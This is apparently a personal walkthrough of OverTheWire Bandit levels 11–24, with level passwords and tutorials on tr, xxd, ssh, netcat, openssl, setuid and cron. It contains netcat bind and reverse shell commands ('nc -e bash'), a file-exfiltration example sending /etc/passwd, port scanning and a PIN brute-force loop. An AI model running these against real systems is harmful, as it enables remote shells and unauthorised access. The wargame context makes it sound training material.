Q11. The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions
a rotated by 13 -> n
n rotated by 13 -> a
N rotated by 13 -> A
A rotated by 13 -> N
bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh
bandit11@bandit:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M  # the order of the two sets must match: a-m maps to n-z and n-z to a-m
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
tr command explained
The Linux tr command translates or deletes characters from a file. tr reads from standard input, translates the characters, and writes the result to standard output.
testfile contains the following:
$ cat testfile  # original contents of testfile
Linux
$ cat testfile | tr a-z A-Z  # output after translation
LINUX
12. The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!)
bandit12@bandit:/tmp/ll$ xxd -r data.txt data.bin
bandit12@bandit:/tmp/ll$ file data.bin
data.bin: gzip compressed data, was "data2.bin", last modified: Tue Oct 16 12:00:23 2018, max compression, from Unix
bandit12@bandit:/tmp/ll$ mv data.bin data.gz
bandit12@bandit:/tmp/ll$ gzip -d data.gz
bandit12@bandit:/tmp/ll$ file data
data: bzip2 compressed data, block size = 900k
# After repeating the rename-and-decompress round until the payload is plain text, the password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
xxd explained
xxd displays a file in hexadecimal. Its options are as follows.

Option | Description
---|---
-a | Autoskip: replace runs of null bytes with a single '*' line (off by default).
-c | Number of bytes shown per line (default 16).
-g | Number of bytes per group (default 2).
-l | Number of bytes to display.
-r | Reverse: convert a hexdump back to binary.
-s | Seek: followed by [+-] and an address; +address starts at that offset, -address starts that many bytes before the end.

Usage:
xxd -a -c 12 -g 1 -l 512 -s +0x200 [inputfile]
# [autoskip] [12 bytes per line] [1 byte per group] [show 512 bytes] [start at 0x200] [input file]
file command explained
file identifies a file's type and can also detect the encoding of some files. It determines the type from the file's header (magic bytes) rather than from the extension, as Windows does.
13. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on
bandit13@bandit:~$ ssh -i ssh.privateKey bandit14@localhost
1. Log in
ssh -p22 [email protected]
2. Run a command directly --> prefer the full path
ssh [email protected] ls -ltr /backup/data
==>ssh [email protected] /bin/ls -ltr /backup/data
3. List known hosts
cat /root/.ssh/known_hosts
4. Run a sudo command remotely over ssh
ssh -t [email protected] sudo rsync hosts /etc/
5. scp
1. Purpose --> secure (encrypted) copy of files to or from a remote host
scp -P22 -r -p /home/omd/h.txt [email protected]:/home/omd/
2. scp in brief
scp is an encrypted remote copy; cp is a local copy
it can push files to the remote host or pull them from it
every run is a full copy (inefficient, fine for the first transfer); use rsync for incremental copies
6. Passwordless login
bandit14@bandit:~$ ssh-keygen
14. The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.
bandit14@bandit:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
Connection closed by foreign host.
## nc also works
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
netcat's principle is simple: it reads data from one end of a network connection and writes it to the other end, over TCP or UDP. It is called netcat because it is cat for the network: cat reads a file and writes it to the screen (stdout by default, which can be redirected elsewhere), and netcat likewise reads input at one end and sends it to the other end of the network. The command-line program is named nc, short for netcat; after installation there is no program called netcat.
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-C Send CRLF as line-ending
-z zero-I/O mode [used for scanning]
The simplest usage is nc <host> <port>:
nc www.apache.org 80
nc -l -p <portnumber>  # -l puts nc in listen mode, -p sets the port number.
nc -l -p 1234  # [assume this host's IP is 192.168.0.1]
Then, from the client, run nc 192.168.0.1 1234; whatever is typed at either end appears at the other. netcat's server and client differ very little: the only distinction is which side ran -l to listen on a port, and once the connection is established there is no difference at all.
This also shows how netcat works: it reads and writes data over a network connection. [It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol] is how the @stake home page puts it.
nc has an -e option that names a program to run once the connection is made. On Windows you can specify -e cmd.exe [WinXP, Win2000]; on 98 specify command.exe; on Linux specify -e bash, or any shell you like, or a program of your own. It is usually used as a backdoor.
With -e, the program you specify takes nc's place in accepting input from the other end, and the result of that input (a command) is sent back to the other end.
server: nc -l -p 1234 -e bash
client: nc 192.168.0.1 1234  # gives a remote login on the server
# -e does not have to be given on the server side; it can be given on the client side instead.
server: nc -l -p 1234
client: nc -e bash 192.168.0.1 1234
# This is the equivalent of logging in to the client from the server.
# As noted above, the client/server distinction does not mean much.
# There is only one criterion for which side acts as the telnet server: whichever side ran -e [shell].
nc can take its input from anywhere, not only the program given with -e but also a file, and it can redirect its output anywhere, not only the default screen. This is done simply with the > and < redirection operators.
Example 1; server: nc -l -c -p 1234  [this is dangerous; do not put it on the public Internet]
client: nc 192.168.0.1 1234 >somefile
Example 2; server: nc -l -c -p 1234 >somefile
client: nc 192.168.0.1 1234 </etc/passwd
Here -c closes the connection when the file transfer ends; it is specific to GNU netcat. Without -c, or with @stake's netcat, press Ctrl+C to close the connection when the transfer ends.
nc -z -w 2 -v -v www.somewhere.com port[,port[,port-port]]
# -z selects zero-I/O mode, which prevents netcat from doing any I/O from the source system; without it netcat would hang on the port indefinitely,
# so -z must be given when scanning.
# -w sets the timeout in seconds
# -v verbose mode; twice for more detail
Example: nc -z -w 2 -v -v www.somewhere.com 20-30,80,100-112,443
I don't recommend using netcat for scanning, though: I find it too slow, the information it returns incomplete and, more importantly, not stealthy enough. nmap is a better choice.
The strength of Unix lies not in any single program but in combining several simple tools; use your imagination and you will find how good the Unix world is.
Example 1. [Background] A host is suspected of having been compromised and fitted with a rootkit; compare it against a clean host.
## compromised host:
find /etc -type f|xargs md5sum|nc -l -p 1234 -c
## clean host:
nc 192.168.0.1 1234|md5sum -c -| grep -v OK
# md5sum -c checks the md5sums in the given list; it is followed by the file name, here -, i.e. standard input.
# When a file's md5sum matches, OK is shown; we filter those lines out and show only the mismatches.
# -v, --invert-match select non-matching lines
Example 2. Check the suid and sgid programs on the compromised host.
# compromised host:
find / -xdev -type f -user root \( -perm -4000 -o -perm -2000 \)|xargs md5sum |nc -l -c -p 1234
# remote host:
nc 192.168.0.33 1234|md5sum -c -|grep -v OK
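Examples 1 and 2 above ship an md5sum list over nc and run `md5sum -c - | grep -v OK` on the clean side. This added Python example (not part of the original tutorial) does the same comparison without the network step: it parses md5sum output and reports every listed path whose clean copy differs or does not exist. The manifest and file contents are constructed samples.

```python
import hashlib


def make_manifest(files):
    """Emulate `find ... | xargs md5sum` on the suspect host over a dict path -> bytes."""
    return "".join(f"{hashlib.md5(b).hexdigest()}  {p}\n" for p, b in sorted(files.items()))


def parse_manifest(text):
    """Parse md5sum output lines: 32 hex digits, '  ' (or ' *' for binary mode), then the path."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, sep, path = line[:32], line[32:34], line[34:]
        if len(digest) != 32 or sep not in ("  ", " *"):
            raise ValueError(f"not an md5sum line: {line!r}")
        entries[path] = digest.lower()
    return entries


def verify(manifest_text, reference_files):
    """What `md5sum -c - | grep -v OK` does on the clean host: hash the clean copy of
    every listed path and report the ones that differ (FAILED) or do not exist (MISSING)."""
    findings = []
    for path, expected in parse_manifest(manifest_text).items():
        if path not in reference_files:
            findings.append((path, "MISSING"))
        elif hashlib.md5(reference_files[path]).hexdigest() != expected:
            findings.append((path, "FAILED"))
    return findings


# Constructed sample: /etc on a clean host, and on a suspect host where /etc/hosts was
# edited and an /etc/ld.so.preload (a common library-hijack location) has appeared.
CLEAN_ETC = {"/etc/hosts": b"127.0.0.1 localhost\n", "/etc/motd": b"Welcome\n"}
SUSPECT_ETC = {"/etc/hosts": b"127.0.0.1 localhost\n10.0.0.5 updates.example\n",
               "/etc/motd": b"Welcome\n",
               "/etc/ld.so.preload": b"/lib/libconstructed.so\n"}
```

Files that exist only on the clean host are not reported, because the list comes from the suspect side; run it once more with the roles swapped to catch deletions.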
Example 3. Image the compromised host remotely.
# compromised host:
dd if=/dev/hda1 bs=1024|nc -l -p 1234 -c
# remote host:
nc 192.168.0.1 1234 >/check/host.disk1
# Then use the Linux kernel's loopback feature to mount host.disk1 read-only and carry out the forensic analysis.
# [For real forensic work, never run find or similar commands on the victim's original disk: that modifies timestamps and destroys the original evidence]
Example 4. Compress files before sending them.
If your files are large, why not compress them first? With a pipe we don't even need to create an intermediate compressed file!
# source host:
tar czf - work | nc -l -c -p 1234
# -c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
# destination host:
nc 192.168.0.1 1234 | tar xzvf -
curl icanhazip.com
curl ifconfig.me
curl curlmyip.com
curl ip.appspot.com
curl ipinfo.io/ip
curl ipecho.net/plain
15. The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.
Helpful note: Getting “HEARTBEATING” and “Read R BLOCK”? Use -ign_eof and read the “CONNECTED COMMANDS” section in the manpage. Next to ‘R’ and ‘Q’, the ‘B’ command also works in this version of that command…
bandit15@bandit:~$ echo BfMYroe26WYalil77FoDi9qh59eK5xNr | openssl s_client -quiet -connect localhost:30001
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd
# -quiet: No s_client output
openssl s_client
s_client is an SSL/TLS client program, the counterpart of s_server; it can talk not only to s_server but to any other service that speaks SSL/TLS.
openssl s_client [-host host] [-port port] [-connect host:port] [-verify depth] [-cert filename]
[-certform DER|PEM] [-key filename] [-keyform DER|PEM] [-pass arg] [-CApath directory] [-CAfile filename]
[-reconnect][-pause] [-showcerts] [-debug] [-msg] [-state] [-nbio_test] [-nbio][-crlf] [-ign_eof] [-no_ign_eof]
[-quiet] [-ssl2] [-ssl3] [-tls1_1] [-tls1_2] [-tls1] [-dtls1] [-no_ssl2][-no_ssl3] [-no_tls1] [-no_tls1_1]
[-no_tls1_2] [-bugs] [-cipher cipherlist] [-starttls protocol] [-engine id] [-tlsextdebug] [-no_ticket]
[-sess_out filename] [-sess_in filename] [-rand file(s)]
# -host host: server address; -port port: server port, default 4433.
# -connect host:port: server address and port; if not set, defaults to the local host and port 4433.
bandit16@bandit:~$ nmap localhost -p31000-32000
Starting Nmap 7.40 ( https://nmap.org ) at 2020-03-02 17:53 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00022s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
31518/tcp open unknown
31790/tcp open unknown
bandit16@bandit:~$ echo cluFn7wTiGryunymYOu4RcffSxQluehd | openssl s_client -connect localhost:31790 -quiet
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
Correct!
-----BEGIN RSA PRIVATE KEY-----
...
vim /tmp/mark/ssh.key  # paste the private key into this file
chmod 400 /tmp/mark/ssh.key  # only the owner of the key file may read it
ssh -i /tmp/mark/ssh.key bandit17@localhost
17. There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new
NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19
diff passwords.new passwords.old
# password is : kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
18. The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.
c:\> ssh [email protected] -p 2220 cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x
19. To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used the setuid binary.
bandit19@bandit:~$ ls -l
total 8
-rwsr-x--- 1 bandit20 bandit19 7296 Oct 16 2018 bandit20-do
bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
-rwsr-x--- permissions
1 : number of hard links
bandit20: owner of the file
bandit19: group the file belongs to
7296: size
Oct 16 2018: modification date and time
bandit20-do: file/directory name
Permissions are broken down into three groups. The first group (rws) defines the permissions of the file owner: here the owner has read and write permission, and the s in the execute position means the setuid bit is enabled, so the file executes with the owner's effective UID (bandit20, as the id output above shows). This is distinct from the sticky bit, which is set on a directory and lets only a file's owner, the directory owner or root delete or rename that file; no other user may delete a file created by someone else. The second group (r-x) defines read and execute permissions for the group. The last group (---) grants nothing to others (everyone else).
The EUID is what Linux uses for permission checks. We can't just change to any EUID unless we are root.
Here are the rules:
– Changing to the SUID or RUID is always ok
– If you are root (UID 0), you can change to any UID. This sets EUID, RUID and SUID.
– Changing from root to any other UID
– RUID is set according to your login.
– EUID differs from RUID only when running set-UID programs, like su
RUID, the real UID, identifies who a user is on the system; once the user has logged in with a username and password, their RUID is fixed.
EUID is what the system uses to decide the user's access to resources; normally it equals the RUID.
SUID opens up permissions to others. Unlike RUID and EUID, which are bound to a user, it is bound to a file rather than to a user.
We know Linux passwords are stored in /etc/shadow. Its attributes are:
steve@ubuntu:~$ ll /etc/shadow
-rw-r----- 1 root shadow 1035 Mar 30 08:19 /etc/shadow
This shows that /etc/shadow belongs to user root and group shadow; only a process whose EUID is root has read and write permission, and the shadow group has read permission.
When you try to open the file with vim from user steve's shell (where the EUID is also steve), you get a permission denied error.
Anyone who has used a UNIX system knows that any user can set a new password for themselves with the passwd command. But we just saw that non-root users cannot even read this file, so how does an ordinary user modify it? The program that passwd actually runs is /usr/bin/passwd, whose attributes are:
-rwsr-xr-x 1 root root 41284 Apr 8 2012 /usr/bin/passwd*
The s in the mode bits is the SUID bit, and every user has permission to execute the program. When user steve runs passwd, the shell forks a child process whose EUID is still steve, then execs /usr/bin/passwd. Because of the SUID bit on /usr/bin/passwd, exec sets the process EUID to root; the process now has root privileges, including read/write access to /etc/shadow, and steve can change his password. When the program exits, steve's EUID is steve again, so steve does not keep root privileges: the elevation is temporary.
Reference: https://blog.csdn.net/cheng20150809/article/details/48450531
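The id output above (uid bandit19, euid bandit20) and the rules just listed, illustrated by an added Python example that is not from the page: switch_allowed() encodes the seteuid rule, and temporarily_drop_privileges() shows the drop-then-restore pattern a setuid program should use around work done on the user's behalf. Run unprivileged, all three UIDs are equal so both switches trivially succeed; under a real setuid binary the middle triple shows the EUID back at the real user.

```python
import os


def switch_allowed(target, ruid, euid, suid):
    """The kernel's rule for seteuid(target): a process whose EUID is 0 may pick any
    UID; anyone else may only move the EUID to the real UID or the saved UID."""
    if euid == 0:
        return True
    return target in (ruid, suid)


def temporarily_drop_privileges():
    """Pattern for a setuid program: lower the EUID to the real user before touching
    anything on the user's behalf, then restore it from the saved UID.
    Returns the (ruid, euid, suid) triples before, while dropped, and after restoring."""
    before = os.getresuid()
    ruid, _euid, suid = before
    os.seteuid(ruid)      # always allowed: the RUID is a valid target
    dropped = os.getresuid()
    os.seteuid(suid)      # always allowed: the saved UID is a valid target
    restored = os.getresuid()
    return before, dropped, restored


def describe(triple):
    """Render a triple the way the level's `id` output does, for reading the result."""
    ruid, euid, suid = triple
    note = "" if ruid == euid else " (set-UID program: EUID differs from RUID)"
    return f"uid={ruid} euid={euid} suid={suid}{note}"
```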
20. There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).
NOTE: Try connecting to your own network daemon to see if it works as you think
tmux  # then open 2 windows
# window 1
nc -l -p 2000
# window 2
./suconnect 2000
# then switch to window 1
bandit20@bandit:~$ nc -l -p 2000
GbKksEFF4yrVs6il55v6gwY5aVje5f0j # send the password in this level
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr # get next level's password
21. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Linux crontab is very similar to Windows Task Scheduler. crontab runs jobs on the system periodically: a crawler that has to run at 8 am every day, or a Tomcat server that has to be restarted at midnight every day, can both be driven by crontab. Nearly every scheduled job can be handled with it.
For example:
## run the job every Sunday at 17:00
0 17 * * sun /scripts/script.sh
## run the job every 10 minutes
*/10 * * * * /scripts/monitor.sh
22. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
## Based on the script, set myname to bandit23 and run the same steps to get the target path
bandit22@bandit:/etc/cron.d$ myname='bandit23'
bandit22@bandit:/etc/cron.d$ echo $myname
bandit23
bandit22@bandit:/etc/cron.d$ mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
bandit22@bandit:/etc/cron.d$ echo $mytarget
8ca319486bfbbc3663ea0fbe81326349
cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
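The cron scripts of levels 21 and 22 both copy a password into /tmp, at a fixed path made world-readable with chmod 644 or at a path derived only from the user name. This added Python example (not the page's or OverTheWire's code) parses /etc/cron.d entries and shows that anyone who can read the script can compute where each user's copy lands, which is the defect an auditor would flag; the cron lines are a constructed sample modelled on the two levels.

```python
import hashlib
import stat

# Constructed sample of /etc/cron.d entries, modelled on the two levels above.
CRON_D_SAMPLE = """\
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
*/10 * * * * bandit23 /usr/bin/cronjob_bandit23.sh
"""


def parse_cron_d(text):
    """Return (schedule, user, command) for each job in /etc/cron.d syntax, where the
    field after the schedule names the user the job runs as."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                    # @reboot/@daily form: one schedule field
            sched, user, cmd = line.split(None, 2)
        else:                                       # five time fields, then user, then command
            fields = line.split(None, 6)
            sched, user, cmd = " ".join(fields[:5]), fields[5], fields[6]
        jobs.append((sched, user, cmd))
    return jobs


def predicted_target(username):
    """Reproduce `echo I am user $myname | md5sum | cut -d ' ' -f 1`
    (echo appends a newline, and that newline is part of the hashed text)."""
    return hashlib.md5(f"I am user {username}\n".encode()).hexdigest()


def predicted_drop_paths(cron_text):
    """For every user a cron.d job runs as, the /tmp path the level-22 style script
    would write that user's password to. Nothing here needs that user's privileges."""
    return {user: f"/tmp/{predicted_target(user)}" for _, user, _ in parse_cron_d(cron_text)}


def world_readable(mode):
    """True when a mode (stat().st_mode or an octal int) lets 'other' read the file,
    which is what the level-21 script's `chmod 644` grants to the password copy."""
    return bool(mode & stat.S_IROTH)
```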
23. A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
timeout -s 9 60 ./$i
rm -f ./$i
fi
done
bandit23@bandit:/tmp/marklee$ cat test.sh  # create test.sh in a directory under /tmp
#!/bin/sh
# the cron job runs this as bandit24, so /tmp/marklee must be writable by bandit24 for the redirect to succeed
cat /etc/bandit_pass/bandit24 > /tmp/marklee/bandit24pass
chmod 777 test.sh
cp test.sh /var/spool/bandit24
# This level did not work for me; the answer never appeared.
# Workaround (using someone else's password...)
bandit23@bandit:/tmp/marklee$ cat /tmp/bandit24/password
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
24. A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
#!/bin/bash
passwd24="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
# try every 4-digit pin; each attempt runs in the background so they proceed concurrently
for a in {0..9}{0..9}{0..9}{0..9}
do
echo "$passwd24 $a" | nc localhost 30002 >> result &
done
wait  # let every background connection finish before reading result
$ sort result | uniq -u  # after the script finishes; the one line that is not repeated is the success message
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG